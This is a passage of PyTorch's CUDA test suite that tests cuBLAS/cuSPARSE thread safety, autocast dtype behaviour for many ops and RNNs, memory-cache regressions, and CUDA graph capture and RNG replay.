                    # thread 0 enqueues its div_, which IS in its own stream,
                    #          but now races with its convolution.
                    results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
                    results[t].div_(4.0)
            torch.cuda.synchronize()

        for _ in range(trials):
            for t in range(num_threads):
                results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')

            threads = [threading.Thread(target=_worker,
                                        args=(t,)) for t in range(num_threads)]

            for thread in threads:
                thread.start()
            for thread in threads:
                thread.join()

            # Each valid (no-padding) conv shrinks the map by 1 per side; after
            # test_iters iterations the all-ones result is (2048 - test_iters)^2.
            for t in range(num_threads):
                self.assertEqual(results[t].sum().item(),
                                 (2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
    """Stress per-thread cuSPARSE handles: concurrent sparse mm on one device must not race.

    Mirrors test_cublas_multiple_threads_same_device but with a sparse
    all-ones weight so the work routes through cuSPARSE.
    """
    size = 1024
    num_threads = 2
    trials = 3
    test_iters = 500

    # Build a sparse COO all-ones (size x size) matrix.
    def ones_sparse(size):
        a = torch.arange(size, device='cuda')
        indices = torch.cartesian_prod(a, a).t()
        values = torch.ones(size * size, device='cuda')
        return torch.sparse_coo_tensor(indices, values)

    weight = ones_sparse(size)
    results = {}
    barrier = threading.Barrier(num_threads)

    def _worker(t):
        my_stream = torch.cuda.Stream()
        # Hard sync so we don't need to worry about creating and using tensors
        # across streams or the fact that default streams are thread-local.
        # Those issues are not the target of this test.
        torch.cuda.synchronize()
        # Line up threads to increase likelihood of race conditions.
        barrier.wait()
        with torch.cuda.stream(my_stream):
            for i in range(test_iters):
                # If all threads are sharing the same cublas handle,
                # the following sequence may occur:
                # thread 0 calls cublasSetStream()
                # thread 1 calls cublasSetStream()
                # thread 0 launches its raw gemm, which it thinks is in
                #          its own stream, but is actually in thread 1's stream.
                # thread 0 enqueues its div_, which IS in its own stream,
                #          but actually now races with its gemm.
                results[t] = weight.mm(results[t])
                results[t].div_(float(size))
        torch.cuda.synchronize()

    for _ in range(trials):
        for t in range(num_threads):
            results[t] = torch.ones((size, size), device='cuda')

        threads = [threading.Thread(target=_worker,
                                    args=(t,)) for t in range(num_threads)]

        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()

        # mm then div by size leaves an all-ones matrix, so the sum is size*size.
        for t in range(num_threads):
            self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
    """Run `op` out-of-place under autocast and verify output dtype and numerics.

    Tries the ``module.op(*args)`` variant (if present) and the ``Tensor.op``
    method variant (if present), asserting each produces ``out_type``
    (defaults to ``run_as_type``).  Then, with autocast disabled, re-runs the
    op with inputs manually cast to ``run_as_type`` and requires identical
    results, since C++-side autocasting should do exactly that cast.

    Args:
        op: operator name, looked up on ``module`` and/or ``torch.Tensor``.
        args: positional arguments; floating-point tensors get cast for the control run.
        run_as_type: dtype autocast is expected to run the op in.
        out_type: expected output dtype; defaults to ``run_as_type``.
        module: namespace to look the op up in, or None for method-only ops.
        add_kwargs: extra keyword arguments forwarded to the op.
    """
    # helper to cast args
    def cast(val, to_type):
        if isinstance(val, torch.Tensor):
            # Only floating-point tensors participate in autocasting.
            return val.to(to_type) if val.is_floating_point() else val
        elif isinstance(val, collections.abc.Iterable):
            return type(val)(cast(v, to_type) for v in val)
        else:
            return val

    if add_kwargs is None:
        add_kwargs = {}
    fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
    self.assertFalse(torch.is_autocast_enabled())
    with torch.autocast('cuda', dtype=fast_dtype):
        self.assertTrue(torch.is_autocast_enabled())

        out_type = out_type if out_type is not None else run_as_type
        output = output_method = None

        # Try module.* variant, if requested:
        if module is not None and hasattr(module, op):
            output = getattr(module, op)(*args, **add_kwargs)
            if isinstance(output, torch.Tensor):
                self.assertTrue(out_type == output.dtype,
                                "autocast for torch.{} produced {}, should produce {}"
                                .format(op, output.dtype, out_type))

        # Try Tensor.* variant:
        if hasattr(torch.Tensor, op):
            output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
            if isinstance(output_method, torch.Tensor):
                # Fix: the message formerly said "should produce torch.{}", but
                # str(out_type) already includes the "torch." prefix, which printed
                # e.g. "torch.torch.float16".  Now matches the module-variant message.
                self.assertTrue(out_type == output_method.dtype,
                                "autocast for torch.{} produced {}, should produce {}"
                                .format(op, output_method.dtype, out_type))

        self.assertTrue((output is not None) or (output_method is not None),
                        "{} not found as an attribute on either Tensor or the requested module {}".format(
                            op, module))

        # Accounts for ops that return Tensors, iterables, and other non-Tensors.
        # For example, lstm_cell returns a tuple and equal returns bool.
        def compare(first, second):
            if isinstance(first, torch.Tensor):
                return torch.equal(first, second)
            elif isinstance(first, collections.abc.Iterable):
                return all(compare(f, s) for f, s in zip(first, second))
            else:
                return first == second

        # If both torch.* and Tensor.* variants were found, check outputs are identical
        if (output is not None) and (output_method is not None):
            self.assertTrue(type(output) == type(output_method))
            comparison = compare(output, output_method)
            self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))

        # Compare numerics to Python-side "autocasting" that (we expect) does the same thing
        # as the C++-side autocasting, and should be bitwise accurate.
        output_to_compare = output if output is not None else output_method
        with torch.autocast('cuda', enabled=False):
            self.assertFalse(torch.is_autocast_enabled())

            if module is not None and hasattr(module, op):
                control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
            else:
                control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
            self.assertTrue(type(output_to_compare) == type(control))
            comparison = compare(output_to_compare, control)
            self.assertTrue(comparison, "torch.{} result did not match control".format(op))
        self.assertTrue(torch.is_autocast_enabled())
    self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
    """Split an autocast op spec into (op, args, kwargs).

    Specs are either (op, args) — kwargs defaults to {} — or
    (op, args, kwargs).
    """
    op, args, *rest = op_with_args
    return op, args, rest[0] if rest else {}
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
    """Ops on the torch.* fp16 autocast list should run in float16 under autocast."""
    with torch.backends.cudnn.flags(enabled=True, deterministic=True):
        for entry in self.autocast_lists.torch_fp16:
            op, op_args = entry[0], entry[1]
            # An optional third element flags entries to skip (e.g. TEST_WITH_ROCM).
            should_skip = entry[2] if len(entry) == 3 else False
            if should_skip:
                continue
            self._run_autocast_outofplace(op, op_args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
    """Run the torch.* fp16 autocast list under bfloat16.

    Ops matched by the name patterns below are expected to raise
    (no bf16 implementation); everything else should run, or raise
    'Device does not support bfloat16' on pre-bf16 hardware.
    """
    with torch.backends.cudnn.flags(enabled=True, deterministic=True):
        for op_with_args in self.autocast_lists.torch_fp16:
            skip_test = False
            op, args = op_with_args[0], op_with_args[1]
            if len(op_with_args) == 3:
                skip_test = op_with_args[2]  # TEST_WITH_ROCM
            should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
                or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
            if not skip_test:
                if should_error_from_not_implemented:
                    with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
                        self._run_autocast_outofplace(op, args, torch.bfloat16)
                else:
                    if torch.cuda.is_bf16_supported():
                        self._run_autocast_outofplace(op, args, torch.bfloat16)
                    else:
                        with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
                            self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
    """Ops on the torch.* fp32 list must produce float32 even under autocast."""
    for entry in self.autocast_lists.torch_fp32:
        op, op_args, extra_kwargs = self.args_maybe_kwargs(entry)
        self._run_autocast_outofplace(op, op_args, torch.float32, add_kwargs=extra_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
    """Ops autocast must explicitly promote should yield float32 results."""
    for op_name, op_args in self.autocast_lists.torch_need_autocast_promote:
        self._run_autocast_outofplace(op_name, op_args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
    """Ops relying on builtin type promotion should yield their listed output dtype."""
    for op_name, op_args, expected_type in self.autocast_lists.torch_expect_builtin_promote:
        self._run_autocast_outofplace(op_name, op_args, torch.float32, out_type=expected_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
    """nn ops on the fp16 autocast list should run in float16 under autocast."""
    with torch.backends.cudnn.flags(enabled=True, deterministic=True):
        for op_name, op_args in self.autocast_lists.nn_fp16:
            self._run_autocast_outofplace(op_name, op_args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
    """Re-run the nn fp16 op list under bfloat16.

    On devices with bf16 support the ops must execute; otherwise each call
    must raise the 'Device does not support bfloat16' error.
    """
    with torch.backends.cudnn.flags(enabled=True, deterministic=True):
        # Device capability is invariant for the whole loop, so query it once.
        bf16_supported = torch.cuda.is_bf16_supported()
        for op_name, op_args in self.autocast_lists.nn_fp16:
            if bf16_supported:
                self._run_autocast_outofplace(op_name, op_args, torch.bfloat16, module=torch._C._nn)
            else:
                with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
                    self._run_autocast_outofplace(op_name, op_args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
    """torch._C._nn ops on the fp32 list must run (staying fp32) under autocast."""
    for op_name, op_args in self.autocast_lists.nn_fp32:
        self._run_autocast_outofplace(op_name, op_args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
    """torch._C._linalg ops on the fp16 list must run under autocast as float16."""
    with torch.backends.cudnn.flags(enabled=True, deterministic=True):
        for op_name, op_args in self.autocast_lists.linalg_fp16:
            self._run_autocast_outofplace(op_name, op_args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
    """Tensor-method ops on the fp16 list (module=None) must run as float16."""
    with torch.backends.cudnn.flags(enabled=True, deterministic=True):
        for op_name, op_args in self.autocast_lists.methods_fp16:
            self._run_autocast_outofplace(op_name, op_args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
    """Tensor-method ops on the fp32 list (module=None) must stay float32."""
    for op_name, op_args in self.autocast_lists.methods_fp32:
        self._run_autocast_outofplace(op_name, op_args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
    """Tensor-method ops using builtin promotion must yield the listed out dtype."""
    for op_name, op_args, expected_out in self.autocast_lists.methods_expect_builtin_promote:
        self._run_autocast_outofplace(op_name, op_args, torch.float32, module=None, out_type=expected_out)
def test_autocast_banned(self):
    """Ops on the banned list must raise RuntimeError inside an autocast region."""
    with torch.autocast('cuda'):
        for op_name, op_args, host_module in self.autocast_lists.banned:
            with self.assertRaises(RuntimeError):
                getattr(host_module, op_name)(*op_args)
def test_autocast_ignored_types(self):
    """Autocast cast policies must leave double and integer inputs untouched.

    For each CastPolicy (fp16, fp32, fp32_set_opt_dtype, fp32_append_dtype),
    compares the dtype produced with autocast enabled against a reference
    computed with autocast explicitly disabled.
    """
    with torch.autocast('cuda'):
        for ignore_type in (torch.double, torch.int32):
            a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
            b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
            c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
            # Tests if CastPolicy::fp16 ops ignore double and int
            # Currently, no ops belonging to this policy support integer inputs.
            if ignore_type is torch.double:
                # Mixed double/half mm must fail: autocast did not downcast the double input.
                with self.assertRaises(RuntimeError):
                    torch.mm(a_ignore, c_16)
                with torch.autocast('cuda', enabled=False):
                    type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
                self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
            # Tests if CastPolicy::fp32 ops ignore double and int
            with torch.autocast('cuda', enabled=False):
                type_no_autocast = torch.pow(a_ignore, 2.0).dtype
            self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
            # Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
            with torch.autocast('cuda', enabled=False):
                type_no_autocast = torch.sum(a_ignore).dtype
            self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
            # Tests if CastPolicy::fp32_append_dtype ops ignore double and int
            # Currently, no ops belonging to this policy support integer inputs.
            if ignore_type is torch.double:
                with torch.autocast('cuda', enabled=False):
                    type_no_autocast = torch.norm(a_ignore).dtype
                self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
    """custom_fwd/custom_bwd without cast_inputs: autocast stays enabled
    inside a custom autograd Function's forward and backward, so mm runs
    in float16 under the autocast region.
    """
    class MyMM(torch.autograd.Function):
        @staticmethod
        @torch.cuda.amp.custom_fwd
        def forward(ctx, a, b):
            # Inputs arrive uncasted (fp32) and autocast is still active here.
            self.assertTrue(a.dtype is torch.float32)
            self.assertTrue(b.dtype is torch.float32)
            self.assertTrue(torch.is_autocast_enabled())
            ctx.save_for_backward(a, b)
            return a.mm(b)
        @staticmethod
        @torch.cuda.amp.custom_bwd
        def backward(ctx, grad):
            # custom_bwd re-enables autocast to match the forward's state.
            self.assertTrue(torch.is_autocast_enabled())
            a, b = ctx.saved_tensors
            return grad.mm(b.t()), a.t().mm(grad)
    mymm = MyMM.apply
    x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
    y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
    with torch.cuda.amp.autocast():
        output = mymm(x, y)
        # mm is on autocast's fp16 list, so the result is half precision.
        self.assertTrue(output.dtype is torch.float16)
        loss = output.sum()
    loss.backward()
def test_autocast_custom_cast_inputs(self):
    """custom_fwd(cast_inputs=float32): inside an autocast region, Tensor
    args are cast to fp32 and autocast is disabled within forward/backward;
    outside an autocast region the decorator is a no-op.
    """
    class MyMM(torch.autograd.Function):
        @staticmethod
        @torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
        def forward(ctx, a, container, expect_type):
            # b is nested in a non-Tensor container; custom_fwd only casts
            # top-level Tensor arguments, so its dtype matches a's expectation
            # by construction of the test inputs.
            b = container[1][0]
            self.assertTrue(a.dtype is expect_type)
            self.assertTrue(b.dtype is expect_type)
            self.assertFalse(torch.is_autocast_enabled())
            ctx.save_for_backward(a, b)
            return a.mm(b)
        @staticmethod
        @torch.cuda.amp.custom_bwd
        def backward(ctx, grad):
            self.assertFalse(torch.is_autocast_enabled())
            a, b = ctx.saved_tensors
            return grad.mm(b.t()), None, None
    mymm = MyMM.apply
    x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
    # Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
    # because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
    # Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
    y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
    with torch.autocast('cuda', ):
        output = mymm(x, y, torch.float32)
        self.assertTrue(output.dtype is torch.float32)
        loss = output.sum()
    loss.backward()
    # Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
    output = mymm(x, y, torch.float16)
    self.assertTrue(output.dtype is torch.float16)
    loss = output.sum()
    loss.backward()
def test_autocast_cat_jit(self):
    """Regression test for https://github.com/pytorch/pytorch/issues/38958:
    cat/stack invoked through the boxed (JIT) API must work under autocast.
    """
    class Model(torch.nn.Module):
        def forward(self):
            first = torch.randn(1)
            second = torch.randn(1)
            joined = torch.cat((first, second), 0)
            stacked = torch.stack([joined, joined], 0)
            return stacked
    # The JIT here doesn't really matter, we just need to call
    # cat via the boxed API
    model = Model()
    scripted_model = torch.jit.script(model)
    with torch.autocast('cuda', enabled=True):
        model()
        scripted_model()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
    """Exhaustively cross RNN/GRU/LSTM configurations under autocast and
    compare against a manually-halved control run; results should be
    bitwise identical barring nondeterminism.
    """
    with torch.backends.cudnn.flags(enabled=True, deterministic=True):
        # seq, batch, features, hidden size
        clses = ("RNN", "GRU", "LSTM")
        T, B, F, H = 3, 4, 5, 6
        dtypes = (torch.float16, torch.float32)
        input_layouts = ("seq_first", "batch_first", "packed")
        for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
             input_dtype, hidden_dtype, weight_dtype) in \
                product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
                        dtypes, dtypes, dtypes):
            if input_layout == "seq_first":
                batch_first = False
                x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
            elif input_layout == "batch_first":
                batch_first = True
                x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
            elif input_layout == "packed":
                batch_first = False
                # NOTE(review): the first randn here is immediately overwritten
                # by the packed sequence below.
                x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
                x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
                                                                        device="cuda", dtype=input_dtype),
                                                            lengths=(3, 2, 1, 3),
                                                            enforce_sorted=False)
            rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
                                         bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
            if try_nonpreflattened_weights:
                # Replacing each param's storage defeats cudnn's preflattened
                # weight buffer, exercising the reflattening path.
                for p in rnn.parameters():
                    with torch.no_grad():
                        p.set_(p.clone())
            h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
                            device="cuda", dtype=hidden_dtype)
            if cls == "LSTM":
                c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
                                device="cuda", dtype=hidden_dtype)
                h = (h, c)
            with torch.autocast('cuda', ):
                out, h_out = rnn(x, h)
            out = out.data if input_layout == "packed" else out
            self.assertEqual(out.dtype, torch.float16)
            # Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
            # at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
            # occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
            self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
            out.sum().backward()
            grads = [p.grad.clone() for p in rnn.parameters()]
            rnn.zero_grad()
            if cls == "LSTM":
                out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
            else:
                out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
            out_control = out_control.data if input_layout == "packed" else out_control
            out_control.sum().backward()
            grads_control = [p.grad.clone() for p in rnn.parameters()]
            # Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
            # autocast and control results should be bitwise identical.
            self.assertEqual(out, out_control)
            if cls == "LSTM":
                self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
                self.assertEqual(h_out[0], h_out_control[0])
                self.assertEqual(h_out[1], h_out_control[1])
            else:
                self.assertEqual(h_out.dtype, torch.float16)
                self.assertEqual(h_out, h_out_control)
            for grad, grad_control in zip(grads, grads_control):
                self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
    """Regression test for https://github.com/pytorch/pytorch/issues/48049:
    under ``torch.no_grad()``, autocast must not re-cache the same
    parameters on every forward, which would grow allocated memory.
    """
    layer = torch.nn.Linear(10, 10).to('cuda')
    batch = torch.randn(1, 10, device='cuda')
    with torch.autocast('cuda', ):
        with torch.no_grad():
            result = layer(batch)
            baseline_mem = torch.cuda.memory_allocated()
            for _ in range(3):
                result = layer(batch)
            self.assertTrue(baseline_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
    """checkpoint_sequential under autocast must preserve requires_grad,
    produce a float16 output, and support backward."""
    net = torch.nn.Sequential(torch.nn.Linear(8, 8),
                              torch.nn.Linear(8, 8),
                              torch.nn.Linear(8, 8)).cuda()
    batch = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
    with torch.autocast('cuda', ):
        result = checkpoint_sequential(net, 2, batch)
    self.assertTrue(result.requires_grad)
    self.assertTrue(result.dtype is torch.float16)
    result.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
    """max() over an axis longer than 2**31 elements must return the correct
    value and (64-bit) index."""
    big = torch.zeros(2**32, device='cuda', dtype=torch.int8)
    big[-1] = 1
    value, index = big.max(0)
    self.assertEqual(value, 1)
    self.assertEqual(index, big.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
    """Calling .numpy() on a CUDA tensor must raise TypeError."""
    with self.assertRaises(TypeError):
        torch.empty(1, device="cuda").numpy()
@unittest.skipIf((not TEST_CUDA) or
                 TEST_WITH_ROCM or
                 int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
    """Capture ten chained adds in a CUDA graph on a side stream and verify
    one replay produces the expected sum."""
    side_stream = torch.cuda.Stream()
    with torch.cuda.stream(side_stream):
        base = torch.full((1000,), 1, device="cuda")
        graph = torch.cuda.CUDAGraph()
        torch.cuda.empty_cache()
        graph.capture_begin()
        acc = base
        for _ in range(10):
            acc = acc + 1
        graph.capture_end()
    torch.cuda.current_stream().wait_stream(side_stream)
    graph.replay()
    self.assertTrue(acc.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
                 TEST_WITH_ROCM or
                 int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
    """Graphed RNG functional ops (dropout, rrelu) must advance the CUDA RNG
    state across replays so that interleaved graphed/eager runs match an
    all-eager control sequence.
    """
    ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
                       (torch.nn.functional.rrelu, {"training": True}),)
    size = 10000
    def run(op, kwargs):
        a = torch.randn((size,), device="cuda", dtype=torch.float)
        # Control
        torch.cuda.manual_seed(5)
        eager_out = a
        for _ in range(6):
            eager_out = op(eager_out, **kwargs)
        graph_in = a.clone()
        stream = torch.cuda.Stream()
        stream.wait_stream(torch.cuda.current_stream())
        with torch.cuda.stream(stream):
            torch.cuda.manual_seed(5)
            g = torch.cuda.CUDAGraph()
            torch.cuda.empty_cache()
            g.capture_begin()
            graph_out = graph_in
            for _ in range(2):
                graph_out = op(graph_out, **kwargs)
            g.capture_end()
        torch.cuda.current_stream().wait_stream(stream)
        # Runs a graphed->eager->graphed sequence of RNG ops.
        # replay() plays 2 invocations of the op, so the sequence has 6
        # invocations total, matching Control.
        # replay() reads from graph_in and writes to graph_out.
        g.replay()
        out = op(graph_out, **kwargs)
        out = op(out, **kwargs)
        graph_in.copy_(out)
        g.replay()
        # If replay() updated RNG state correctly, graph_out
        # should now hold data equal to eager_out.
        try:
            self.assertEqual(eager_out, graph_out)
        except Exception as e:
            raise RuntimeError("Failed on ", op) from e
        # We hold references to all tensors used across streams up til this sync,
        # so no need to call record_stream on those tensors.
        torch.cuda.synchronize()
    for op, kwargs in ops_with_kwargs:
        run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
                 TEST_WITH_ROCM or
                 int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
    """Graphed RNG distribution ops (torch.* factories and in-place Tensor
    methods) must reproduce the eager control values after replay, given
    identical seeds and a matching dummy-op prelude.
    """
    size = 10000
    input = torch.rand((size,), device="cuda", dtype=torch.float)
    alloc = torch.empty((size,), device="cuda", dtype=torch.float)
    # Torch ops to test with sample args (tuple) and kwargs (dict)
    torch_with_args = (("bernoulli", (input.clone(),), {}),
                       # multinomial uses some uncapturable CUDA calls.
                       # TODO: reenable multinomial tests if/when the implementation is capturable.
                       # ("multinomial", (input.clone(), size, True), {}),
                       # ("multinomial", (input.clone(), size // 2, False), {}),
                       # TODO: reenable normal test, where std is a device
                       # tensor, when graph test failures are fixed
                       # ("normal", (input.clone() + 1, input.clone()), {}),
                       ("normal", (input.clone() + 1, 1.0), {}),
                       ("poisson", (input.clone(),), {}),
                       ("rand", (size,), {"device": "cuda", "dtype": torch.float}),
                       ("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
                       ("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
    # Tensor methods to test with sample args (tuple)
    tensor_with_args = (("bernoulli_", (input.clone(),)),
                        ("cauchy_", ()),
                        ("exponential_", ()),
                        ("geometric_", (0.3,)),
                        ("log_normal_", ()),
                        ("normal_", ()),
                        ("random_", ()),
                        ("uniform_", ()),)
    def run(module, op, args, kwargs):
        torch.cuda.manual_seed(5)
        # Each path runs a dummy op to increment the state a bit before creating controls.
        if (module == "torch"):
            dummy = getattr(torch, op)(*args, **kwargs)
            control1 = getattr(torch, op)(*args, **kwargs)
            control2 = getattr(torch, op)(*args, **kwargs)
        else:
            dummy = alloc.clone()
            control1 = alloc.clone()
            control2 = alloc.clone()
            getattr(dummy, op)(*args)
            getattr(control1, op)(*args)
            getattr(control2, op)(*args)
        stream = torch.cuda.Stream()
        stream.wait_stream(torch.cuda.current_stream())
        with torch.cuda.stream(stream):
            torch.cuda.manual_seed(5)
            g = torch.cuda.CUDAGraph()
            torch.cuda.empty_cache()
            if (module == "torch"):
                g.capture_begin()
                t1 = getattr(torch, op)(*args, **kwargs)
                t2 = getattr(torch, op)(*args, **kwargs)
                g.capture_end()
            else:
                t1 = alloc.clone()
                t2 = alloc.clone()
                g.capture_begin()
                getattr(t1, op)(*args)
                getattr(t2, op)(*args)
                g.capture_end()
        torch.cuda.current_stream().wait_stream(stream)
        # Capture itself must not have executed the RNG ops: t1/t2 should
        # still differ from the eager controls before replay().
        try:
            self.assertNotEqual(control1, t1)
            self.assertNotEqual(control2, t2)
        except Exception as e:
            raise RuntimeError("Failed on " + module + "." + op) from e
        # Runs a dummy op prelude, as for controls, to make sure replay()
        # picks up the dummy op's state increment.
        if module == "torch":
            dummy = getattr(torch, op)(*args, **kwargs)
        else:
            dummy = alloc.clone()
            getattr(dummy, op)(*args)
        # Runs RNG ops that fill t1 and t2.
        g.replay()
        try:
            self.assertEqual(control1, t1)
            self.assertEqual(control2, t2)
        except Exception as e:
            raise RuntimeError("Failed on " + module + "." + op) from e
        # We hold references to all tensors used across streams up til this sync,
        # so no need to call record_stream on those tensors.
        torch.cuda.synchronize()
    for op_with_args in torch_with_args:
        run("torch", *op_with_args)
    for meth_with_args in tensor_with_args:
        # Adds an empty dict for kwargs, which none of the Tensor methods use
        run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
                 TEST_WITH_ROCM or
                 int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
    """Two graphs captured back-to-back must replay correctly whether or not
    they share a memory pool, and pool sharing should save exactly one
    small-buffer cudaMalloc relative to the no-sharing case.
    """
    torch.cuda.empty_cache()
    size = 1000
    kSmallBuffer = 2097152
    def func_with_temps(t, val):
        # Allocates two temporaries to exercise the graph's private pool.
        x = t.clone() + val
        y = t.clone() + val
        return x + y
    s = torch.cuda.Stream()
    # "Don't share" must come first: it establishes reserved_no_sharing,
    # which the sharing cases compare against.
    for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
        g0 = torch.cuda.CUDAGraph()
        g1 = torch.cuda.CUDAGraph()
        a = torch.ones((size,), device="cuda")
        s.wait_stream(torch.cuda.current_stream())
        with torch.cuda.stream(s):
            g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
            g0.capture_begin(*g0_args)
            b = a.clone()
            for _ in range(5):
                b = func_with_temps(b, 1)
            g0.capture_end()
            g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
            g1.capture_begin(*g1_args)
            for _ in range(5):
                b = func_with_temps(b, 1)
            g1.capture_end()
        torch.cuda.current_stream().wait_stream(s)
        # mixes unrelated eager ops with replays
        c = a.clone()
        for _ in range(2):
            c = func_with_temps(c, 3)
        g0.replay()
        for _ in range(2):
            c = func_with_temps(c, 3)
        g1.replay()
        for _ in range(2):
            c = func_with_temps(c, 3)
        self.assertEqual(b.sum().item(), size * 3070)
        self.assertEqual(c.sum().item(), size * 442)
        if share_mem != "Don't share":
            self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
                             kSmallBuffer)
        else:
            reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
    del a, b, c, g0, g1
    # Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
    torch.cuda.synchronize()
    torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
               "see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
                 TEST_WITH_ROCM or
                 int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
